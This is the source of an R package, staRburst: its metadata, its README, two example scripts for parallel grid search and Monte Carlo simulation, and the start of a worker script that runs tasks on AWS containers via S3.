Package: starburst
Type: Package
Title: Seamless AWS Cloud Bursting for Parallel R Workloads
Version: 0.3.9
Authors@R: c(
    person("Scott", "Friedman", email = "help@starburst.ing", role = c("aut", "cre"))
    )
Description: A 'future' backend that enables seamless execution of parallel R
    workloads on 'Amazon Web Services' ('AWS', <https://aws.amazon.com>),
    including 'EC2' and 'Fargate'. 'staRburst' handles environment
    synchronization, data transfer, quota management, and worker orchestration
    automatically, allowing users to scale from local execution to 100+ cloud
    workers with a single line of code change.
License: Apache License 2.0
Encoding: UTF-8
Depends: R (>= 4.0.0)
Imports: future (>= 1.33.0), globals, paws.compute, paws.storage,
        paws.management, paws.cost.management, paws.security.identity,
        qs2, uuid, renv, jsonlite, crayon, digest, base64enc, processx
Suggests: future.apply, testthat (>= 3.0.0), knitr, rmarkdown, withr,
        mockery
VignetteBuilder: knitr
URL: https://starburst.ing, https://github.com/scttfrdmn/starburst
BugReports: https://github.com/scttfrdmn/starburst/issues
Config/roxygen2/version: 8.0.0
NeedsCompilation: no
Packaged: 2026-07-22 16:56:23 UTC; scttfrdmn
Author: Scott Friedman [aut, cre]
Maintainer: Scott Friedman <help@starburst.ing>
Repository: CRAN
Date/Publication: 2026-07-22 17:50:02 UTC

# Generated by roxygen2: do not edit by hand

S3method(future,starburst)
S3method(launchFuture,StarburstBackend)
S3method(listFutures,StarburstBackend)
S3method(nbrOfWorkers,StarburstBackend)
S3method(plan,starburst)
S3method(print,StarburstSessionStatus)
S3method(resolved,StarburstFuture)
S3method(result,StarburstFuture)
S3method(run,StarburstFuture)
export(StarburstBackend)
export(StarburstFuture)
export(starburst)
export(starburst_check_quota_request)
export(starburst_cleanup_ecr)
export(starburst_cluster)
export(starburst_config)
export(starburst_estimate)
export(starburst_is_configured)
export(starburst_list_sessions)
export(starburst_logs)
export(starburst_map)
export(starburst_quota_status)
export(starburst_rebuild_environment)
export(starburst_request_quota_increase)
export(starburst_session)
export(starburst_session_attach)
export(starburst_setup)
export(starburst_setup_ec2)
export(starburst_status)
importFrom(future,future)
importFrom(future,launchFuture)
importFrom(future,listFutures)
importFrom(future,nbrOfWorkers)
importFrom(future,plan)
importFrom(future,resolved)
importFrom(future,result)
importFrom(future,run)
importFrom(stats,runif)
importFrom(utils,capture.output)

<!-- README.md is generated from README.Rmd. Please edit that file -->

# staRburst <img src="man/figures/logo.png" align="right" height="200" alt="staRburst logo" />

<!-- badges: start -->

[![CRAN
status](https://www.r-pkg.org/badges/version/starburst)](https://cran.r-project.org/package=starburst)
[![R-CMD-check](https://github.com/scttfrdmn/starburst/actions/workflows/R-CMD-check.yaml/badge.svg)](https://github.com/scttfrdmn/starburst/actions/workflows/R-CMD-check.yaml)
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/license/apache-2-0)
<!-- badges: end -->

> Seamless AWS cloud bursting for parallel R workloads

staRburst lets you run parallel R code on AWS with zero infrastructure
management. Scale from your laptop to 100+ cloud workers with a single
function call. Supports both EC2 (recommended for performance and cost)
and Fargate (serverless) backends.

## Features

- **Simple Setup**: One-time configuration (~2 minutes), then seamless
  operation
- **Simple API**: Direct `starburst_map()` function - no new concepts to
  learn
- **Flexible Backends**: EC2 (recommended - faster, cheaper, spot
  support) and Fargate (serverless)
- **Detached Sessions**: Submit long-running jobs and detach - retrieve
  results anytime
- **Automatic Environment Sync**: Your packages and dependencies
  automatically available on workers
- **Smart Quota Management**: Automatically handles AWS quota limits
  with wave execution
- **Cost Transparent**: Every run shows an estimated cost (measured
  runtime × current AWS On-Demand/Spot pricing) so there are no billing
  surprises
- **Auto Cleanup**: Workers shut down automatically when done

## Installation

From CRAN:

``` r
install.packages("starburst")
```

Development version (from GitHub):

``` r
remotes::install_github("scttfrdmn/starburst")
```

## Quick Start

``` r
library(starburst)

# One-time setup (~2 min to provision; first run also builds the worker image,
# +5-10 min once)
starburst_setup()

# Run parallel computation on AWS (each task should be real work — seconds+ —
# so it's worth shipping; batch tiny items first). Console output is illustrative:
results <- starburst_map(
  inputs,                       # e.g. a list of scenarios / parameter sets
  function(x) expensive_computation(x),
  workers = 50
)
#> [Starting] Starting starburst cluster with 50 workers
#> [Status] Processing 200 items with 50 workers
#> [Starting] Submitting 200 tasks...
#> [Wait] Progress: 200/200
#> [OK] Completed
#> [Cost] Estimated cost: (printed per run)
```

## Example: Monte Carlo Simulation

``` r
library(starburst)

# Define simulation
simulate_portfolio <- function(seed) {
  set.seed(seed)
  returns <- rnorm(252, mean = 0.0003, sd = 0.02)
  prices <- cumprod(1 + returns)

  list(
    final_value = prices[252],
    sharpe_ratio = mean(returns) / sd(returns) * sqrt(252)
  )
}

# Each simulation is tiny (sub-millisecond), so BATCH them: 100 tasks of 100
# simulations each, not 10,000 one-simulation tasks. (Thousands of tiny tasks are
# an anti-pattern — see the "Workload Shapes" guide for measured numbers.)
batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
results <- starburst_map(
  batches,
  function(seeds) lapply(seeds, simulate_portfolio),
  workers = 50
)
results <- unlist(results, recursive = FALSE)  # flatten to 10,000 results

# Extract results
final_values <- sapply(results, function(x) x$final_value)
sharpe_ratios <- sapply(results, function(x) x$sharpe_ratio)

# Summary
mean(final_values)    # Average portfolio outcome
quantile(final_values, c(0.05, 0.95))  # Risk range
```

> For real, measured performance (when the cloud wins, when it loses,
> and how to size tasks/workers), see the [Workload
> Shapes](https://starburst.ing/articles/workload-shapes.html) and
> [Performance](https://starburst.ing/articles/performance.html) guides.

## Advanced Usage

### Reuse Cluster for Multiple Operations

``` r
# Create cluster once
cluster <- starburst_cluster(workers = 50, cpu = 4, memory = "8GB")

# Run multiple analyses
results1 <- cluster$map(dataset1, analysis_function)
results2 <- cluster$map(dataset2, processing_function)
results3 <- cluster$map(dataset3, modeling_function)

# All use the same Docker image and configuration
```

### Custom Worker Configuration

``` r
# For memory-intensive workloads
results <- starburst_map(
  large_datasets,
  memory_intensive_function,
  workers = 20,
  cpu = 8,
  memory = "16GB"
)

# For CPU-intensive workloads
results <- starburst_map(
  cpu_tasks,
  cpu_intensive_function,
  workers = 50,
  cpu = 4,
  memory = "8GB"
)
```

### Detached Sessions

Run long jobs and disconnect - results persist in S3:

``` r
# Start a detached session (EC2 + Spot by default)
session <- starburst_session(workers = 50)

# Fan work out by submitting one task per input
task_ids <- lapply(inputs, function(input) {
  session$submit(quote(expensive_function(input)),
                 globals = list(input = input))
})
session_id <- session$session_id

# Disconnect - job continues running.
# Later (hours/days), reconnect from a fresh R session:
session <- starburst_session_attach(session_id)
status  <- session$status()          # Check progress
results <- session$collect(wait = TRUE)  # Collect results (in submission order)

# Cleanup when done
session$cleanup()
```

## How It Works

1.  **Environment Snapshot**: Captures your R packages using renv
2.  **Container Build**: Creates a Docker image with your environment,
    cached in ECR
3.  **Task Creation**: Creates one task per element of your input (`.x`)
    — there is no automatic chunking; batch small items yourself if
    per-task overhead matters
4.  **Worker Launch**: Starts EC2 workers by default (Spot-enabled), or
    Fargate tasks if you pass `launch_type = "FARGATE"`; falls back to
    waves if quota-limited
5.  **Data Transfer**: Serializes each task’s function, inputs, and
    globals to S3 using the fast `qs2` format
6.  **Execution**: Each worker pulls a task from S3, runs your function,
    pushes the result back to S3
7.  **Result Collection**: Downloads and combines results in the
    original order
8.  **Cleanup**: Automatically shuts workers down (warm-pool timeout
    configurable)

## Cost Management

``` r
# Set an hourly cost ceiling (USD/hour)
starburst_config(
  max_hourly_cost = 10,       # Jobs estimated over $10/hour won't start
  cost_alert_threshold = 5     # Warn at $5/hour
)

# Costs shown transparently
results <- starburst_map(data, fn, workers = 100)
#> [Starting] Starting starburst cluster with 100 workers
#> [OK] Completed in 1380.0 seconds
#> [Cost] Estimated cost: $1.34
```

## Quota Management

When using the Fargate backend, staRburst automatically handles AWS
Fargate vCPU quota limits (EC2 uses your standard On-Demand/Spot
limits):

``` r
results <- starburst_map(data, fn, workers = 100, cpu = 4, launch_type = "FARGATE")
#> [!] Requested 100 workers (400 vCPUs) but quota allows 25 workers (100 vCPUs)
#> [!] Using 25 workers instead
```

Your work still completes, just with fewer workers. You can request
quota increases through AWS Service Quotas.

## API Reference

### Main Functions

- `starburst_map(.x, .f, workers, ...)` - Parallel map over data
- `starburst_cluster(workers, cpu, memory)` - Create reusable cluster
- `starburst_setup()` - Initial AWS configuration
- `starburst_config(...)` - Update configuration
- `starburst_status()` - Check cluster status

### Configuration Options

``` r
starburst_config(
  max_hourly_cost = 10,        # USD/hour rate ceiling
  cost_alert_threshold = 5     # USD/hour warning
)
```

## Documentation

Full documentation available at
**[starburst.ing](https://starburst.ing)**

- [Getting Started
  Guide](https://starburst.ing/articles/getting-started.html)
- [Detached
  Sessions](https://starburst.ing/articles/detached-sessions.html)
- [Example Vignettes](https://starburst.ing/articles/)
- [API Reference](https://starburst.ing/reference/)
- [Security Guide](https://starburst.ing/articles/security.html)
- [Troubleshooting](https://starburst.ing/articles/troubleshooting.html)

## Comparison

| Feature                   | staRburst | RStudio Server on EC2 | Coiled (Python) |
|---------------------------|-----------|-----------------------|-----------------|
| Setup time                | 2 minutes | 30+ minutes           | 5 minutes       |
| Infrastructure management | Zero      | Manual                | Zero            |
| Learning curve            | Minimal   | Medium                | Medium          |
| Auto scaling              | Yes       | No                    | Yes             |
| Cost optimization         | Automatic | Manual                | Automatic       |
| R-native                  | Yes       | Yes                   | No (Python)     |

## Requirements

- R \>= 4.0
- AWS account with:
  - AWS CLI configured or `AWS_PROFILE` set
  - IAM permissions for ECS, ECR, S3, VPC
  - Two IAM roles (created during setup):
    - `starburstECSExecutionRole` - for ECS/ECR access
    - `starburstECSTaskRole` - for S3 access

For detailed setup instructions, see the [Getting
Started](https://starburst.ing/articles/getting-started.html) guide.

## Roadmap

### v0.3.9 (current CRAN release)

- ✅ Backend arguments (`launch_type`/`instance_type`/`use_spot`) on
  `starburst_map()`/`starburst_cluster()`
- ✅ One-step EC2 setup (`starburst_setup()` provisions the default
  capacity provider)
- ✅ Live AWS pricing for cost estimates (Pricing API + spot history,
  cached)
- ✅ Measured performance/workload-shape guides

### v0.3.8

- ✅ Direct API (`starburst_map`, `starburst_cluster`)
- ✅ EC2 backend (default, with spot instances) + Fargate (serverless
  alternative)
- ✅ Detached session mode for long-running jobs
- ✅ Automatic environment management
- ✅ Cost tracking and quota handling
- ✅ Full `future` backend integration (`future.apply`, `furrr`,
  `targets`)
- ✅ Security hardening (safe command execution, worker limits)
- ✅ Published on CRAN (0 errors, 0 warnings, 0 notes)

### Future Releases

- [ ] Performance optimizations
- [ ] Enhanced error recovery
- [ ] Interactive progress monitoring
- [ ] Multi-region support

## Contributing

Contributions welcome! See the [GitHub
repository](https://github.com/scttfrdmn/starburst) for contribution
guidelines.

## License

Apache License 2.0 - see
[LICENSE](https://github.com/scttfrdmn/starburst/blob/main/LICENSE)

Copyright 2026 Scott Friedman

## Citation

``` bibtex
@software{starburst,
  title = {staRburst: Seamless AWS Cloud Bursting for R},
  author = {Scott Friedman},
  year = {2026},
  version = {0.3.9},
  url = {https://starburst.ing},
  license = {Apache-2.0}
}
```

## Credits

Built using the [paws](https://github.com/paws-r/paws) AWS SDK for R.

Container management with [renv](https://rstudio.github.io/renv/) and
[rocker](https://rocker-project.org/).

Inspired by [Coiled](https://coiled.io/) for Python/Dask.

# Logo Files

This directory contains the staRburst logo and other figures.

## Logo

Please save the staRburst logo image as `logo.png` in this directory.

The logo should be the sticker-style image with:
- "staRburst" branding
- "Bursting R Code to the Cloud!" tagline
- Rocket and explosion graphics
- Orange/blue color scheme

The README.md references this logo at `man/figures/logo.png`.

#!/usr/bin/env Rscript
#
# Parallel Grid Search Example
#
# This script demonstrates parallel hyperparameter tuning with cross-validation.
# It evaluates 81 parameter combinations for a gradient boosting model.
#
# Usage:
#   Rscript grid-search.R
#   # or from R:
#   source(system.file("examples/grid-search.R", package = "starburst"))

library(starburst)

cat("=== Parallel Grid Search for Hyperparameter Tuning ===\n\n")

# Generate synthetic classification data
set.seed(2024)

n_samples <- 10000
n_features <- 20

cat("Generating synthetic dataset...\n")

X <- matrix(rnorm(n_samples * n_features), nrow = n_samples)
colnames(X) <- paste0("feature_", 1:n_features)

true_coef <- rnorm(n_features)
linear_pred <- X %*% true_coef
prob <- 1 / (1 + exp(-linear_pred))
y <- rbinom(n_samples, 1, prob)

# Train/test split
train_idx <- sample(1:n_samples, 0.7 * n_samples)
X_train <- X[train_idx, ]
y_train <- y[train_idx]
X_test <- X[-train_idx, ]
y_test <- y[-train_idx]

cat(sprintf("✓ Dataset created:\n"))
cat(sprintf("  Training samples: %s\n", format(length(y_train), big.mark = ",")))
cat(sprintf("  Test samples: %s\n", format(length(y_test), big.mark = ",")))
cat(sprintf("  Features: %d\n", n_features))
cat(sprintf("  Class balance: %.1f%% / %.1f%%\n\n",
            mean(y_train) * 100, (1 - mean(y_train)) * 100))

# Define parameter grid
param_grid <- expand.grid(
  learning_rate = c(0.01, 0.05, 0.1),
  max_depth = c(3, 5, 7),
  subsample = c(0.6, 0.8, 1.0),
  min_child_weight = c(1, 3, 5),
  stringsAsFactors = FALSE
)

cat(sprintf("Grid search space:\n"))
cat(sprintf("  Total combinations: %d\n", nrow(param_grid)))
cat(sprintf("  With 5-fold CV: %d model fits\n\n", nrow(param_grid) * 5))

# Simplified GBM training (mock implementation)
train_gbm <- function(X, y, params, n_trees = 50) {
  n <- nrow(X)
  pred <- rep(mean(y), n)

  complexity_factor <- params$max_depth * (1 / params$learning_rate) *
                      (1 / params$subsample)
  training_time <- 0.001 * complexity_factor * n_trees

  Sys.sleep(min(training_time, 5))

  pred <- pred + rnorm(n, 0, 0.1)
  pred <- pmin(pmax(pred, 0), 1)

  list(predictions = pred, params = params)
}

# Cross-validation function
cv_evaluate <- function(param_row, X_data, y_data, n_folds = 5) {
  params <- as.list(param_row)

  n <- nrow(X_data)
  fold_size <- floor(n / n_folds)
  fold_indices <- sample(rep(1:n_folds, length.out = n))

  cv_scores <- numeric(n_folds)

  for (fold in 1:n_folds) {
    val_idx <- which(fold_indices == fold)
    train_idx <- which(fold_indices != fold)

    X_fold_train <- X_data[train_idx, , drop = FALSE]
    y_fold_train <- y_data[train_idx]
    X_fold_val <- X_data[val_idx, , drop = FALSE]
    y_fold_val <- y_data[val_idx]

    model <- train_gbm(X_fold_train, y_fold_train, params)

    baseline_accuracy <- mean(y_fold_val == round(mean(y_fold_train)))

    param_quality <- (params$learning_rate >= 0.05) * 0.02 +
                    (params$max_depth >= 5) * 0.02 +
                    (params$subsample >= 0.8) * 0.01 +
                    rnorm(1, 0, 0.02)

    accuracy <- min(baseline_accuracy + param_quality, 1.0)
    cv_scores[fold] <- accuracy
  }

  list(
    params = params,
    mean_cv_score = mean(cv_scores),
    std_cv_score = sd(cv_scores),
    cv_scores = cv_scores
  )
}

# Local benchmark (10 combinations)
cat("Running local benchmark (10 parameter combinations)...\n")
set.seed(999)
sample_params <- param_grid[sample(1:nrow(param_grid), 10), ]

local_start <- Sys.time()

local_results <- lapply(1:nrow(sample_params), function(i) {
  cv_evaluate(sample_params[i, ], X_train, y_train, n_folds = 5)
})

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "mins"))

cat(sprintf("✓ Completed in %.2f minutes\n", local_time))
cat(sprintf("  Average time per combination: %.1f seconds\n",
            local_time * 60 / nrow(sample_params)))
cat(sprintf("  Estimated time for full grid: %.1f minutes\n\n",
            local_time * nrow(param_grid) / nrow(sample_params)))

# Cloud execution
n_workers <- 27

cat(sprintf("Running grid search (%d combinations) on %d workers...\n",
            nrow(param_grid), n_workers))

cloud_start <- Sys.time()

results <- starburst_map(
  1:nrow(param_grid),
  function(i) cv_evaluate(param_grid[i, ], X_train, y_train, n_folds = 5),
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n✓ Completed in %.2f minutes\n\n", cloud_time))

# Extract results
cv_scores <- sapply(results, function(x) x$mean_cv_score)
cv_stds <- sapply(results, function(x) x$std_cv_score)

results_df <- cbind(param_grid,
                   mean_score = cv_scores,
                   std_score = cv_stds)

results_df <- results_df[order(-results_df$mean_score), ]

# Print results
cat("=== Grid Search Results ===\n\n")
cat(sprintf("Total combinations evaluated: %d\n", nrow(results_df)))
cat(sprintf("Best CV score: %.4f (± %.4f)\n\n",
            results_df$mean_score[1], results_df$std_score[1]))

cat("=== Best Hyperparameters ===\n")
cat(sprintf("  Learning rate: %.3f\n", results_df$learning_rate[1]))
cat(sprintf("  Max depth: %d\n", results_df$max_depth[1]))
cat(sprintf("  Subsample: %.2f\n", results_df$subsample[1]))
cat(sprintf("  Min child weight: %d\n\n", results_df$min_child_weight[1]))

cat("=== Top 5 Parameter Combinations ===\n")
for (i in 1:5) {
  cat(sprintf("\n%d. Score: %.4f (± %.4f)\n", i,
              results_df$mean_score[i], results_df$std_score[i]))
  cat(sprintf("   lr=%.3f, depth=%d, subsample=%.2f, min_child=%d\n",
              results_df$learning_rate[i],
              results_df$max_depth[i],
              results_df$subsample[i],
              results_df$min_child_weight[i]))
}

# Parameter impact analysis
cat("\n=== Parameter Impact Analysis ===\n")
for (param in c("learning_rate", "max_depth", "subsample", "min_child_weight")) {
  param_means <- aggregate(mean_score ~ get(param),
                          data = results_df, FUN = mean)
  names(param_means)[1] <- param

  cat(sprintf("\n%s:\n", param))
  for (i in 1:nrow(param_means)) {
    cat(sprintf("  %s: %.4f\n",
                param_means[i, 1],
                param_means[i, 2]))
  }
}

# Performance comparison
cat("\n=== Performance Comparison ===\n\n")
estimated_local <- local_time * nrow(param_grid) / nrow(sample_params)
speedup <- estimated_local / cloud_time
cat(sprintf("Local (estimated): %.1f minutes\n", estimated_local))
cat(sprintf("Cloud (%d workers): %.2f minutes\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

cat("\n✓ Done!\n")

#!/usr/bin/env Rscript

# ============================================================================
# REAL SCIENCE: Massive Monte Carlo Simulation
# ============================================================================
#
# Ultra-large scale Monte Carlo for financial risk / physics simulation:
# - 100 scenarios × 1,000,000 iterations each = 100 million total iterations
# - Each iteration: Complex path-dependent calculation
# - Per scenario: ~3-5 minutes of pure computation
# - Total sequential time: ~5-8 hours on M4 Pro
# - With 100 workers: ~5-10 minutes
# - Expected speedup: 60-100x
#
# This is computationally intensive, algorithmically simple, and bulletproof.
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== REAL SCIENCE: Massive Monte Carlo Simulation ===\n\n")

# Configuration
n_scenarios <- 100
iters_per_scenario <- 1000000  # 1 million iterations per scenario
scenarios_per_worker <- 1      # Each scenario is big enough for one worker

cat("Monte Carlo Configuration:\n")
cat(sprintf("  Scenarios: %d\n", n_scenarios))
cat(sprintf("  Iterations per scenario: %s\n", format(iters_per_scenario, big.mark = ",")))
cat(sprintf("  Total iterations: %s\n\n",
            format(as.numeric(n_scenarios) * iters_per_scenario, big.mark = ",")))

# Complex Monte Carlo simulation function
# Simulates path-dependent stochastic process (e.g., options pricing, epidemic model)
run_monte_carlo_scenario <- function(scenario_ids) {
  # Define iterations here so it's available in worker scope
  iters_per_scenario <- 1000000  # 1 million iterations

  results <- lapply(scenario_ids, function(scenario_id) {
    set.seed(scenario_id)

    # Scenario parameters (varies by ID for ensemble)
    mu <- 0.05 + (scenario_id * 0.001)      # Drift
    sigma <- 0.2 + (scenario_id * 0.0005)   # Volatility
    S0 <- 100                               # Initial value
    T <- 1.0                                # Time horizon (years)
    dt <- 1.0 / 252                         # Daily timesteps
    n_steps <- floor(T / dt)                # ~252 steps
    barrier <- 90                           # Knock-out barrier

    # Storage for statistics
    final_values <- numeric(iters_per_scenario)
    max_values <- numeric(iters_per_scenario)
    barrier_hits <- 0

    # Main Monte Carlo loop
    for (iter in 1:iters_per_scenario) {
      # Simulate path (Geometric Brownian Motion)
      S <- S0
      S_max <- S0
      hit_barrier <- FALSE

      for (step in 1:n_steps) {
        # Random walk step
        z <- rnorm(1)
        S <- S * exp((mu - 0.5 * sigma^2) * dt + sigma * sqrt(dt) * z)

        # Track maximum
        if (S > S_max) S_max <- S

        # Check barrier
        if (S < barrier) {
          hit_barrier <- TRUE
          break
        }
      }

      final_values[iter] <- S
      max_values[iter] <- S_max
      if (hit_barrier) barrier_hits <- barrier_hits + 1
    }

    # Compute statistics
    # Payoff calculations (path-dependent option pricing)
    call_payoff <- pmax(final_values - 100, 0)
    barrier_call_payoff <- ifelse(
      (1:iters_per_scenario) <= barrier_hits,
      0,  # Knocked out
      call_payoff[(barrier_hits + 1):iters_per_scenario]
    )

    # Risk metrics
    var_95 <- quantile(final_values, 0.05)  # Value at Risk (5th percentile)
    cvar_95 <- mean(final_values[final_values <= var_95])  # Conditional VaR

    list(
      scenario_id = scenario_id,
      mu = mu,
      sigma = sigma,
      n_iterations = iters_per_scenario,
      mean_final = mean(final_values),
      sd_final = sd(final_values),
      mean_payoff = mean(call_payoff),
      barrier_prob = barrier_hits / iters_per_scenario,
      var_95 = var_95,
      cvar_95 = cvar_95,
      max_observed = max(max_values)
    )
  })

  results
}

# Test single scenario timing
cat("Testing single scenario (1M iterations)...\n")
cat("This will take a few minutes...\n")
single_start <- Sys.time()
test_result <- run_monte_carlo_scenario(1:1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("Single scenario: %.1f seconds (%.1f minutes)\n\n",
            single_time, single_time / 60))

# Estimate total time
total_sequential <- single_time * n_scenarios
cat(sprintf("Estimated sequential time: %.1f hours\n", total_sequential / 3600))
cat("(This would saturate M4 Pro cores for hours!)\n\n")

# Create batches
scenario_batches <- split(
  1:n_scenarios,
  ceiling(seq_along(1:n_scenarios) / scenarios_per_worker)
)

n_workers <- length(scenario_batches)

cat(sprintf("CLOUD EXECUTION: %d workers processing %d scenarios\n",
            n_workers, length(scenario_batches)))
cat(sprintf("Each worker runs %d scenario(s) (~%.1f minutes)\n\n",
            scenarios_per_worker, (scenarios_per_worker * single_time) / 60))

# LOCAL benchmark
cat("LOCAL (M4 Pro): Running 1 scenario for timing...\n")
local_start <- Sys.time()
local_results <- run_monte_carlo_scenario(1:1)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_estimated <- local_time * n_scenarios

cat(sprintf("✓ 1 scenario in %.1f seconds (%.1f minutes)\n",
            local_time, local_time / 60))
cat(sprintf("  Estimated for %d: %.1f hours\n\n", n_scenarios, local_estimated / 3600))

# CLOUD execution
cat("Starting cloud Monte Carlo...\n")
cat("(Your laptop can relax)\n\n")

cloud_start <- Sys.time()
cloud_results <- starburst_map(
  scenario_batches,
  run_monte_carlo_scenario,
  workers = n_workers
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ All scenarios completed in %.1f minutes (%.1f hours)\n\n",
            cloud_time / 60, cloud_time / 3600))

# Performance metrics
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time

cat("╔══════════════════════════════════════════════════╗\n")
cat("║     MONTE CARLO SIMULATION RESULTS               ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Scenarios simulated: %d\n", n_scenarios))
cat(sprintf("Total iterations: %s\n\n",
            format(as.numeric(n_scenarios) * iters_per_scenario, big.mark = ",")))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE                                    │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f hours             │\n", local_estimated / 3600))
cat(sprintf("│ Cloud (%d workers): %.1f hours            │\n", n_workers, cloud_time / 3600))
cat(sprintf("│ Speedup: %.0fx                             │\n", speedup))
cat(sprintf("│ Time saved: %.1f hours                    │\n", time_saved / 3600))
cat("└────────────────────────────────────────────────┘\n\n")

# Scientific/Financial results
all_results <- unlist(cloud_results, recursive = FALSE)
mean_finals <- sapply(all_results, function(r) r$mean_final)
var_95s <- sapply(all_results, function(r) r$var_95)
barrier_probs <- sapply(all_results, function(r) r$barrier_prob)

cat("┌────────────────────────────────────────────────┐\n")
cat("│ SIMULATION RESULTS                             │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Mean final value: $%.2f (±%.2f)           │\n",
            mean(mean_finals), sd(mean_finals)))
cat(sprintf("│ VaR (95%%): $%.2f                          │\n",
            mean(var_95s)))
cat(sprintf("│ Barrier hit probability: %.1f%%            │\n",
            mean(barrier_probs) * 100))
cat(sprintf("│ Mean option value: $%.2f                  │\n",
            mean(sapply(all_results, function(r) r$mean_payoff))))
cat("└────────────────────────────────────────────────┘\n\n")

cat("✓ Monte Carlo simulation complete!\n\n")

if (speedup >= 50) {
  cat(sprintf("🎉 MASSIVE SCALE: %.0fx speedup on %s iterations!\n",
              speedup, format(as.numeric(n_scenarios) * iters_per_scenario, big.mark = ",")))
  cat(sprintf("%.1f hours of computation done in %.1f minutes.\n",
              local_estimated / 3600, cloud_time / 60))
  cat("This is the power of cloud parallel computing. 🚀\n")
} else {
  cat(sprintf("Current speedup: %.0fx\n", speedup))
}

#!/usr/bin/env Rscript

# staRburst Worker Script
# This script runs inside Fargate containers to execute user tasks

main <- function() {
  # Get configuration from environment variables
  task_id <- Sys.getenv("TASK_ID")
  cluster_id <- Sys.getenv("CLUSTER_ID")
  bucket <- Sys.getenv("S3_BUCKET")
  region <- Sys.getenv("AWS_DEFAULT_REGION", "us-east-1")

  if (task_id == "" || bucket == "") {
    stop("Missing required environment variables: TASK_ID, S3_BUCKET")
  }

  message(sprintf("Worker starting for task: %s", task_id))

  tryCatch({
    # Load required packages
    library(paws.storage)
    library(qs2)

    # Create S3 client with connect timeout to prevent hanging
    s3 <- paws.storage::s3(config = list(
      region = region,
      connect_timeout = 60    # 60 seconds to establish connection
    ))

    # Download task from S3
    task_key <- sprintf("tasks/%s.qs", task_id)
    task_file <- tempfile(fileext = ".qs")

    message(sprintf("Downloading task from s3://%s/%s", bucket, task_key))

    s3$download_file(
      Bucket = bucket,
      Key = task_key,
      Filename = task_file
    )

    # Load task
    task <- qs2::qs_read(task_file)
    unlink(task_file)

    # Auto-detect mode from task metadata
    if (!is.null(task$session_id)) {
      # Detached mode
      message(sprintf("Running in DETACHED mode for session: %s", task$session_id))
      run_detached_worker(task, s3, bucket, region, task_id)
    } else {
      # Ephemeral mode (existing behavior)
      message("Running in EPHEMERAL mode")
      run_ephemeral_worker(task, s3, bucket, region)
    }

  }, error = function(e) {
    message(sprintf("Worker failed: %s", e$message))
    message(sprintf("Traceback: %s", paste(capture.output(traceback()), collapse = "\n")))

    # Try to upload error result
    tryCatch({
      library(paws.storage)
      library(qs2)

      s3 <- paws.storage::s3(config = list(region = region))

      error_result <- list(
        error = TRUE,
        message = e$message,
        traceback = capture.output(traceback())
      )

      result_key <- sprintf("results/%s.qs", task_id)
      result_file <- tempfile(fileext = ".qs")

      qs2::qs_save(error_result, result_file)

      s3$put_object(
        Bucket = bucket,
        Key = result_key,
        Body = result_file
      )

      unlink(result_file)

      message("Error result uploaded")
    }, error = function(e2) {
      message(sprintf("Failed to upload error result: %s", e2$message))
    })

    quit(status = 1)
  })
}

#' Run worker in ephemeral mode (existing behavior)
#'
#' Executes one task and exits
run_ephemeral_worker <- function(task, s3, bucket, region) {
  result <- execute_task_content(task)

  # Upload result and exit
  upload_result(result, task$task_id, s3, bucket)

  message("Worker completed successfully")
  quit(status = 0)
}

#' Run worker in detached mode
#'
#' Executes initial task, then polls for more work
run_detached_worker <- function(task, s3, bucket, region, worker_id) {
  session_id <- task$session_id
  idle_timeout <- 300  # 5 minutes
  last_task_time <- Sys.time()
  poll_interval <- 1
  max_poll_interval <- 30

  # Execute initial task (if not bootstrap)
  if (!is.null(task$expr)) {
    message("Executing initial task...")
    result <- execute_task_content(task)
    upload_result(result, task$task_id, s3, bucket)
    update_task_status_to_completed(session_id, task$task_id, s3, bucket, region)
    last_task_time <- Sys.time()
  } else {
    message("Bootstrap task - entering polling loop")
  }

  # Polling loop
  message("Entering polling loop for pending tasks...")

  while (TRUE) {
    # Check idle timeout
    idle_seconds <- difftime(Sys.time(), last_task_time, units = "secs")
    if (idle_seconds > idle_timeout) {
      message(sprintf("Idle timeout reached (%.0f seconds), exiting gracefully", idle_seconds))
      quit(status = 0)
    }

    # Try to claim a pending task
    pending_tasks <- list_pending_tasks(session_id, s3, bucket)

    if (length(pending_tasks) > 0) {
      message(sprintf("Found %d pending tasks, attempting to claim one", length(pending_tasks)))

      claimed <- FALSE
      for (pending_task_id in pending_tasks) {
        claimed <- try_claim_task(session_id, pending_task_id, worker_id, s3, bucket, region)

        if (claimed) {
          message(sprintf("Successfully claimed task: %s", pending_task_id))

          # Download and execute task
          task_data <- download_task(pending_task_id, s3, bucket)

          # Update status to running
          update_task_status_simple(session_id, pending_task_id, "running", s3, bucket, region)

          # Execute task
          result <- execute_task_content(task_data)

          # Upload result
          upload_result(result, pending_task_id, s3, bucket)

          # Update status to completed
          update_task_status_to_completed(session_id, pending_task_id, s3, bucket, region)

          last_task_time <- Sys.time()
          poll_interval <- 1  # Reset backoff
          break
        }
      }

      if (!claimed) {
        message("Failed to claim any pending tasks (race condition)")
      }
    } else {
      # No pending tasks, increase backoff
      message(sprintf("No pending tasks found, sleeping for %d seconds", poll_interval))
      Sys.sleep(poll_interval)
      poll_interval <- min(poll_interval * 2, max_poll_interval)
    }
  }
}

#' Execute task content (chunk or expr)
#'
#' Returns result object
execute_task_content <- function(task) {
  # Detect task format (chunk-based or Future-based)
  if (!is.null(task$chunk)) {
    # OLD FORMAT: Chunk-based execution
    message(sprintf("Task loaded with %d items in chunk", length(task$chunk)))
    message("Executing task...")

    chunk_results <- lapply(task$chunk, function(x) {
      tryCatch({
